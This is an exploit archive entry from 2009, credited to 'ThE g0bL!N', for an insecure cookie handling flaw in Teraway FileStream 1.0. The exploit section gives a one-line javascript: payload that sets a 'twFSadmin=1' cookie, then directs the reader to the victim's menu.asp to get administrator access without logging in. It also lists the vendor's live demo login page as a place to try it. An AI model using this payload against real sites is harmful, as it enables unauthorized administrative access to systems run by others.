id: 5109
date: 04/26/2009
title: Teraway FileStream 1.0 Insecure Cookie Handling Vulnerability
author: ThE g0bL!N
cves: 

=============================================================
Teraway FileStream 1.0 Insecure Cookie Handling Vulnerability
=============================================================


-------------------------------------[+]
Homepage:http://www.teraway.com
Product: Teraway FileStream 1.0
-------------------------------------
Teraway FileStream 1.0 Insecure Cookie Handling Vuln
-------------------------------------
Exploit:
--------

javascript:document.cookie="twFSadmin=1;path=/";
Then Go to  http://victim/path/menu.asp

demo
----
http://www.teraway.com/filestream/demo/login.asp


--------------------------------------------------



#  0day.today [2023-03-26]  #